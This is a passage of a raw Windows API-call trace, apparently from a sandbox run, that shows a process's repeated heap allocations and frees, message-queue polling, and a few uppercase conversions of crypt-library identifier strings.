wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0191.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0191.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0191.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1293020 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0191.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0191.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0191.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0191.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0191.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0191.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13a8020 [0191.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1293020 | out: hHeap=0x970000) returned 1 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0191.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0191.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0191.305] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0191.306] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0191.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0191.306] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0191.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0191.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0191.307] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0191.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0191.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0191.308] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0191.308] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0191.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0191.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0191.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0191.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0191.309] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0191.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0191.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0191.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0191.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0191.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0191.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129e020 [0191.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0191.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0191.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14bf020 [0191.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0191.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0191.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129e020 | out: hHeap=0x970000) returned 1 [0191.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0191.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0191.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0191.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0191.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0191.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129d020 [0191.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x14bf020 | out: hHeap=0x970000) returned 1 [0191.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0191.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0191.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x14b2020 [0191.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129d020 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0191.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0191.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x118d020 | out: hHeap=0x970000) returned 1 [0191.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0191.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x107d020 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0191.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13a8020 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0191.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf61020 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0191.546] HeapFree (in: hHeap=0x970000, 